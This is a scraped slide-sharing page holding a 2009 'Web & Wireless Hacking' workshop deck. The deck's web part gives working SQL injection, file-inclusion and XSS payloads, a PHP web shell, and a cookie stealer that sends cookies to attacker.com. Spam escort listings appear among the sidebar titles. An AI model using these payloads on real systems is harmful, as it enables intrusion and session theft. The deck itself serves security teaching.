WiFi Secuiry: Attack & DefenceWiFi Secuiry: Attack & Defence
WiFi Secuiry: Attack & Defence
 
Mobile Revolution | Helthcare Technology Trend Presentation | 2009
Mobile Revolution | Helthcare Technology Trend Presentation | 2009Mobile Revolution | Helthcare Technology Trend Presentation | 2009
Mobile Revolution | Helthcare Technology Trend Presentation | 2009
 
Flippin gthe classroom using mobile technology - #PedagooLondon2015 presentation
Flippin gthe classroom using mobile technology - #PedagooLondon2015 presentationFlippin gthe classroom using mobile technology - #PedagooLondon2015 presentation
Flippin gthe classroom using mobile technology - #PedagooLondon2015 presentation
 
Role of sports in modern world For Speech 10 minutes
Role of sports in modern world For Speech 10 minutesRole of sports in modern world For Speech 10 minutes
Role of sports in modern world For Speech 10 minutes
 
Benefits of sports informative speech
Benefits of sports informative speechBenefits of sports informative speech
Benefits of sports informative speech
 
Anti tree firesheep
Anti tree firesheepAnti tree firesheep
Anti tree firesheep
 
Advanced WiFi Attacks Using Commodity Hardware
Advanced WiFi Attacks Using Commodity HardwareAdvanced WiFi Attacks Using Commodity Hardware
Advanced WiFi Attacks Using Commodity Hardware
 
05 wi fi network security
05 wi fi network security05 wi fi network security
05 wi fi network security
 
Gprs security threats and solutions
Gprs security threats and solutionsGprs security threats and solutions
Gprs security threats and solutions
 
Connector losses Optical Fiber Cable
Connector losses Optical Fiber CableConnector losses Optical Fiber Cable
Connector losses Optical Fiber Cable
 
Offline bruteforce attack on WiFi Protected Setup
Offline bruteforce attack on WiFi Protected SetupOffline bruteforce attack on WiFi Protected Setup
Offline bruteforce attack on WiFi Protected Setup
 
Wifi Password Hack v2.85 - The best software to hack the Wifi networks !
Wifi Password Hack v2.85 - The best software to hack the Wifi networks !Wifi Password Hack v2.85 - The best software to hack the Wifi networks !
Wifi Password Hack v2.85 - The best software to hack the Wifi networks !
 
Optical fiber communication
Optical fiber communicationOptical fiber communication
Optical fiber communication
 
Evolution of mobile technology
Evolution of mobile technologyEvolution of mobile technology
Evolution of mobile technology
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
VTU ECE 7th sem VLSI lab manual
VTU ECE 7th sem VLSI lab manualVTU ECE 7th sem VLSI lab manual
VTU ECE 7th sem VLSI lab manual
 
VLSI Training presentation
VLSI Training presentationVLSI Training presentation
VLSI Training presentation
 
Ethical Hacking & Penetration Testing
Ethical Hacking & Penetration TestingEthical Hacking & Penetration Testing
Ethical Hacking & Penetration Testing
 

Similar to Web & Wireless Hacking

Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive MeasuresShubham Takode
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteDNN
 
DBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxDBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxsiti829412
 
Web security
Web securityWeb security
Web securitydogangcr
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Xavier Ashe
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFBrian Huff
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injectionJawhar Ali
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksAll Things Open
 
Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real worldMadhu Akula
 
CS166 Final project
CS166 Final projectCS166 Final project
CS166 Final projectKaya Ota
 

Similar to Web & Wireless Hacking (20)

Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
Sql Injection
Sql InjectionSql Injection
Sql Injection
 
How to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET WebsiteHow to Harden the Security of Your .NET Website
How to Harden the Security of Your .NET Website
 
SQL Injection in JAVA
SQL Injection in JAVASQL Injection in JAVA
SQL Injection in JAVA
 
DBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxDBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptx
 
Codeinjection
CodeinjectionCodeinjection
Codeinjection
 
Web security
Web securityWeb security
Web security
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
 
seminar report on Sql injection
seminar report on Sql injectionseminar report on Sql injection
seminar report on Sql injection
 
SQL injection
SQL injectionSQL injection
SQL injection
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
 
Web & Cloud Security in the real world
Web & Cloud Security in the real worldWeb & Cloud Security in the real world
Web & Cloud Security in the real world
 
Ceh v5 module 14 sql injection
Ceh v5 module 14 sql injectionCeh v5 module 14 sql injection
Ceh v5 module 14 sql injection
 
CS166 Final project
CS166 Final projectCS166 Final project
CS166 Final project
 
Owasp & Asp.Net
Owasp & Asp.NetOwasp & Asp.Net
Owasp & Asp.Net
 

More from Don Anto

Red Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceRed Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceDon Anto
 
IPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesIPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesDon Anto
 
Network & Computer Forensic
Network & Computer Forensic Network & Computer Forensic
Network & Computer Forensic Don Anto
 
BGP Vulnerability
BGP VulnerabilityBGP Vulnerability
BGP VulnerabilityDon Anto
 
Spying The Wire
Spying The WireSpying The Wire
Spying The WireDon Anto
 
Distributed Cracking
Distributed CrackingDistributed Cracking
Distributed CrackingDon Anto
 
Deep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking PhilosopyDeep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking PhilosopyDon Anto
 

More from Don Anto (7)

Red Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in CyberspaceRed Team: Emulating Advanced Adversaries in Cyberspace
Red Team: Emulating Advanced Adversaries in Cyberspace
 
IPv6 Fundamentals & Securities
IPv6 Fundamentals & SecuritiesIPv6 Fundamentals & Securities
IPv6 Fundamentals & Securities
 
Network & Computer Forensic
Network & Computer Forensic Network & Computer Forensic
Network & Computer Forensic
 
BGP Vulnerability
BGP VulnerabilityBGP Vulnerability
BGP Vulnerability
 
Spying The Wire
Spying The WireSpying The Wire
Spying The Wire
 
Distributed Cracking
Distributed CrackingDistributed Cracking
Distributed Cracking
 
Deep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking PhilosopyDeep Knowledge on Network Hacking Philosopy
Deep Knowledge on Network Hacking Philosopy
 

Recently uploaded

Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 

Recently uploaded (20)

Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 

Web & Wireless Hacking

  • 1. IPSECS WEB & WIRELESS HACKING Don “df0x” Anto Makasar, Juni 2009 www.ipsecs.com
  • 2. IPSECS Content • Introduction • Web Exploitation – SQL Injection – File Inclussion – XSS • Breaking Wireless Infrastructure – War Driving – Exploiting Wireless Network www.ipsecs.com
  • 3. IPSECS Introduction • Don “df0x” Anto • IT security researcher • Hacker?? Not, but IT security researcher • Contact – we@ipsecs.com • URL – http://ipsecs.com – http://kandangjamur.net • Bachelor degree in Electrical engineering • Add my facebook dj.antoxz@gmail.com www.ipsecs.com
  • 4. IPSECS st 1 Day, WEB HACKING www.ipsecs.com
  • 5. IPSECS Web Exploitation • It's exploiting web application programming flaws. • Programming mistakes are always happen. • Targeting clients or servers. • Possible to steal databases and other sensitif informations, steal cookie or session, execute arbitrary commands, or fully compromise the system. • It's easy to do. Google helps you :). www.ipsecs.com
  • 6. IPSECS Common Web Exploitation • SQL Injection, an attack which's targeting sensitive information in database server. Possible to compromise system. • File Inclussion, an attack which usually to gain shell access on the remote target. – Local file inclussion – Remote file inclussion • Cross Site Scripting (XSS), an attack which targeting user or client of vulnerable website. – Doom – Persistent – Non-persistent www.ipsecs.com
  • 7. IPSECS SQL INJECTION www.ipsecs.com
  • 8. IPSECS SQL Injection • Injecting malicious SQL query to take profits. • Usually is used to bypass login, steal sensitive information on database. Further attack can be used in fully compromising system. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
  • 9. IPSECS SQL Injection in login form • User input in login form is not validated before to be executed in database. • Attacker is possible to send arbitrary SQL query through login form and bypassing login process. • Attacker can also execute other SQL query. www.ipsecs.com
  • 10. IPSECS Vulnerable Code • Example vulnerable code in login process: $pass = md5($_POST['password']); $query = "SELECT * FROM tblUser WHERE username = '" . $_POST['username'] . "' AND password = '" . $pass . "'"; $q = mysql_query($query); • Username which's sent from login form is not validated. www.ipsecs.com
  • 11. IPSECS Exploit Login • Exploit code: username = admin' OR 'a'='a password = terserah • SQL query to be executed by database server is: SELECT * FROM tblUser WHERE username = 'admin' OR 'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47' www.ipsecs.com
  • 12. IPSECS SQL Injection in login form www.ipsecs.com
  • 13. IPSECS SQL Logic • AND operator is executed before OR, result of query is: 'a'='a' AND password = 'e00b29d5b34c3f78df09d45921c9ec47' • Boolean logic result is FALSE, then: username = 'admin' OR FALSE • Boolean logic result is TRUE (admin). • Attacker successfully bypassing login form. www.ipsecs.com
  • 14. IPSECS SQL Injection in URI parameter • Parameter input in URI is not validated before to be executed in database. • Attacker is possible to send arbitrary SQL query by modifying parameter input. www.ipsecs.com
  • 15. IPSECS Vulnerable Code • Example vulnerable code while inputing URI parameters: $query = "SELECT * FROM news WHERE id=" . $_GET['aid'] ; $q = mysql_query($query); • Parameter 'aid' which's taken from URI is not validated. www.ipsecs.com
  • 16. IPSECS Exploiting SQL Injection • Checking vulnerability using AND logic http://example.com/news.php?aid=1 AND 1=1-- http://example.com/news.php?aid=1 AND 1=0-- • Knowing number of field using UNION SELECT http://example.com/news.php?aid=1 UNION SELECT 1-- http://example.com/news.php?aid=1 UNION SELECT 1,2-- http://example.com/news.php?aid=1 UNION SELECT 1,2,3,..,n-- www.ipsecs.com
  • 17. IPSECS Knowing Number of Field www.ipsecs.com
  • 18. IPSECS SQL Injection in URI parameter • In Case table which generates “news” contains 3 fields www.ipsecs.com
  • 19. IPSECS Exploiting SQL Injection • Knowing tables in database http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()-- • Knowing fields in table 'tblUser' http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='tblUser'-- OR IN HEXAL http://example.com/news.php?aid=-1 UNION SELECT 1,2,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x74626c55736572-- www.ipsecs.com
  • 20. IPSECS Knowing Tables in DB www.ipsecs.com
  • 21. IPSECS Exploiting SQL Injection • Viewing information in tables http://example.com/news.php?aid=-1 UNION SELECT 1,2,CONCAT_WS(0x2c,username,password,namaLengkap) FROM tblUser-- • Viewing arbitrary files (if FILE access is granted) http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE('/etc/passwd')-- OR IN HEXAL http://example.com/news.php?aid=-1 UNION SELECT 1,2,LOAD_FILE(0x2f6574632f706173737764)-- www.ipsecs.com
  • 22. IPSECS Viewing Table Records www.ipsecs.com
  • 23. IPSECS FILE INCLUSSION www.ipsecs.com
  • 24. IPSECS File Inclussion • Including malicious or sensitive file to be executed by server. • Usually is used to steal sensitive information, execute arbitrary command, or compromise system. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
  • 25. IPSECS Local File Inclussion • Including sensitive file in local server (vulnerable server) to be executed by server. • Usually is used to steal sensitive information, execute arbitrary command. Further attack can be used in fully compromising system. • User input is not well validated or no sanitation process. www.ipsecs.com
  • 26. IPSECS Vulnerable Code • Example vulnerable code: define('DOCROOT', '/var/www/html/modules'); $filename = DOCROOT . "/" . $_GET['module'] . ".php"; include($filename); • Parameter 'module' which's taken from URI is not validated. www.ipsecs.com
  • 27. IPSECS Viewing Sensitive Files • Exploit code to viewing sensitive files on vulnerable system: http://example.com/index.php?module=../../../../../../../etc/passwd%00 http://example.com/index.php?module=../../../../../../../etc/group%00 www.ipsecs.com
  • 28. IPSECS File /etc/passwd www.ipsecs.com
  • 29. IPSECS Placing Malicious Log • Placing malicious apache log uses telnet to inject system command: $ telnet example.com 80 Trying example.com... Connected to example.com. Escape character is '^]'. GET /<?php passthru($_GET['cmd']) ?> HTTP/1.1 Host:example.com www.ipsecs.com
  • 30. IPSECS Malicious Log www.ipsecs.com
  • 31. IPSECS Executing Command • Executing command via access_log apache (in case apache log is readable) http://example.com/index.php? module=../../../../../../../usr/local/apache/logs/access_log %00&cmd=uname -a http://example.com/index.php? module=../../../../../../../usr/local/apache/logs/access_log %00&cmd=id www.ipsecs.com
  • 32. IPSECS Command “id” www.ipsecs.com
  • 33. IPSECS Remote File Inclussion • Including sensitive file in remote server (attacker server) to be executed by server. • Usually to execute arbitrary command using web shell. Further attack can be used in fully compormising system. • User input is not well validated or no sanitation process. www.ipsecs.com
  • 34. IPSECS Vulnerable Code • Example vulnerable code: $filename = $_GET['page'] . ".php"; include($filename); • Parameter 'page' which's taken from URI is not validated. www.ipsecs.com
  • 35. IPSECS PHP Shell • Simple web shell: <?php /*Basic PHP web shell injek.txt*/ if(isset($_GET['exec'])){ if(!empty($_GET['exec'])){ $cmd = $_GET['exec']; if(function_exists('passthru')){ passthru($cmd); } } } ?> www.ipsecs.com
  • 36. IPSECS Public PHP Shell • Widely known web shell : r57, c99 • Commonly used in exploiting remote file inclussion. www.ipsecs.com
  • 37. IPSECS r57 www.ipsecs.com
  • 38. IPSECS Executing Command • Injecting command: http://example.com/view.php? page=http://attacker.com/injek.txt&exec=id http://example.com/view.php? page=http://attacker.com/injek.txt&exec=ls -al www.ipsecs.com
  • 39. IPSECS Command 'ls -al' www.ipsecs.com
  • 40. IPSECS CROSS SITE SCRIPTING www.ipsecs.com
  • 41. IPSECS Cross Site Scripting • Inserting HTML/java script code to be executed by client browser which views vulnerable website. • Usually is used in stealing cookie on computer client, phising, and tricking user to download arbitrary file. • User input is not well validated or no sanitation process. • All examples and demos bellow are in PHP MySQL. www.ipsecs.com
  • 42. IPSECS Cross Site Scripting • Doom based XSS, XSS in vulnerable file which comes from default installed software. • Non-Persistent XSS, XSS in vulnerable web page which can be exploited by tricking user to click malicious URI. Characteristic : temporal. • Persistent XSS, XSS in vulnerable web page which can be exploited to insert malicious code to database. Characteristic : permanent. www.ipsecs.com
  • 43. IPSECS Vulnerable Code • Example vulnerable code: echo "<pre> Searching for ". $_GET['key'] . "...</pre><br/>n"; • Parameter 'key' which's sent from search form is not validated. www.ipsecs.com
  • 44. IPSECS Cross Site Scripting • Checking if XSS vulnerable: http://example.com/search.php?key=<script>alert('XSS found dude!')</script> www.ipsecs.com
  • 45. IPSECS Cross Site Scripting www.ipsecs.com
  • 46. IPSECS Cookie Stealing • Stealing cookie: http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script> • Content payload.js document.location="http://attacker.com/cookie-save.php? c="+document.cookie www.ipsecs.com
  • 47. IPSECS Cookie Grabber • Content of cookie-save.php: <?php /*Cookie stealer*/ $f = fopen('/tmp/cookie.txt', 'a'); $date = date("j F, Y, g:i a"); fwrite($f, "IP Address : ". $_SERVER['REMOTE_ADDR'] ."n". "Cookie : ". $_GET['c'] ."n". "Date and Time : ". $date ."n". "nn"); fclose($f); ?> www.ipsecs.com
  • 48. IPSECS Hexal Encoding • Anonymize malicious URI using hexal encoding: http://example.com/search.php?key=<script src="http://attacker.com/payload.js"></script> HEXAL ENCODING http://example.com/search.php?key=%3c %73%63%72%69%70%74%20%73%72%63%3d %22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b %65%72%2e%63%6f%6d%2f%70%61%79%6c%6f%61%64%2e %6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e www.ipsecs.com
  • 49. IPSECS DEMO - Q&A WEB HACKING www.ipsecs.com
  • 50. IPSECS THANK YOU! www.ipsecs.com
  • 51. IPSECS nd 2 Day, WIRELESS HACKING www.ipsecs.com
  • 52. IPSECS Wireless Network • Now, is widely used in campus, government, company, and many public places. • Provide network for mobile devices. • More flexible than wired network. • More insecure than wired network, so here we go! www.ipsecs.com
  • 53. IPSECS War Driving • Activity to search Wi-Fi wireless network. • Public tools to do War Driving – Windows : NetStumbler, Wireshark – Linux : Kismet, AirCrack-ng, AirSnort, Wireshark – OSX : KisMac • I'm using Linux Ubuntu 8.10. www.ipsecs.com
  • 54. IPSECS Kismet • Console based 802.11 wireless network detector and sniffer. • It identifies wireless network by pasively sniffing. • It's already exist on Ubuntu Repository or you can download from www.kismetwireless.net. • Use 'apt-get install kismet' on Ubuntu, read the README if you want to install from source. www.ipsecs.com
  • 55. IPSECS Kismet www.ipsecs.com
  • 56. IPSECS Kismet www.ipsecs.com
  • 57. IPSECS Kismet www.ipsecs.com
  • 58. IPSECS AirSnort • GUI based 802.11 wireless network detector. • Designed for WEP Cracker. • It isn't ready on my Ubuntu repository, download from www.sourceforge.net. • Read the README to install. www.ipsecs.com
  • 59. IPSECS aircrack-ng (formerly : aircrack) • Console based 802.11 wireless network detector. • Designed for WEP & WPA-PSK Cracker. • It's already exist on Ubuntu repository or you can downlod from www.aircrack-ng.org. • Use 'apt-get install aircrack-ng' on Ubuntu, read the README if you want to install from source. www.ipsecs.com
  • 60. IPSECS aircrack-ng (formerly : aircrack) airodump wlan0 www.ipsecs.com
  • 61. IPSECS Wireshark • GUI based network protocol analyzer for UNIX and Windows. • The most complete protocol analyzer which support many data communication protocols. • It's already exist on Ubuntu repository or you can download from www.wireshark.org. • Use 'apt-get install wireshark' on Ubuntu,read the README if you want to install from source. www.ipsecs.com
  • 62. IPSECS Wireshark www.ipsecs.com
  • 63. IPSECS NetStumbler • Best known windows tool to find wireless networks. • It is function like Kismet on linux or KisMac on OSX. • You can download NetStumbler in www.netstumbler.com • Since I use ubuntu, there's no demo for this tool. www.ipsecs.com
  • 64. IPSECS NetStumbler www.ipsecs.com
  • 65. IPSECS Wireless Network Protection • MAC Filtering • WEP (Wired Equivalent Privacy) • WPA (Wi-Fi Protected Access) • WPA2 (Wi-Fi Protected Access 2) • Captive Portal www.ipsecs.com
  • 66. IPSECS Exploiting Wireless Network • Miss Configuration (Human Error) • Spoofing • Cracking Protection • Denial of Service www.ipsecs.com
  • 67. IPSECS Miss Configuration • Default Configuration on Device (Access Point) • Default Username & Password • Default Range IP Address • SNMP public & private community • No encryption enabled www.ipsecs.com
  • 68. IPSECS Spoofing & Rogue AP • Spoofing MAC address to bypass MAC filtering. • Tools – Linux : ifconfig – Windows : smac, regedit • Creating Rogue AP to trick wireless user, then doing Man in The Middle and sniffing. • Tools – airsnarf http://airsnarf.shmoo.com www.ipsecs.com
  • 69. IPSECS MAC Spoofing www.ipsecs.com
  • 70. IPSECS WEP Cracking • WEP is based on RC4 algorithm and CRC32. • Collecting as much as possible weak IV (Insialization Vector) to be used in FMS attack. • Accelerated collecting IV using traffic injection. • Tools : aircrack-ng, AirSnort www.ipsecs.com
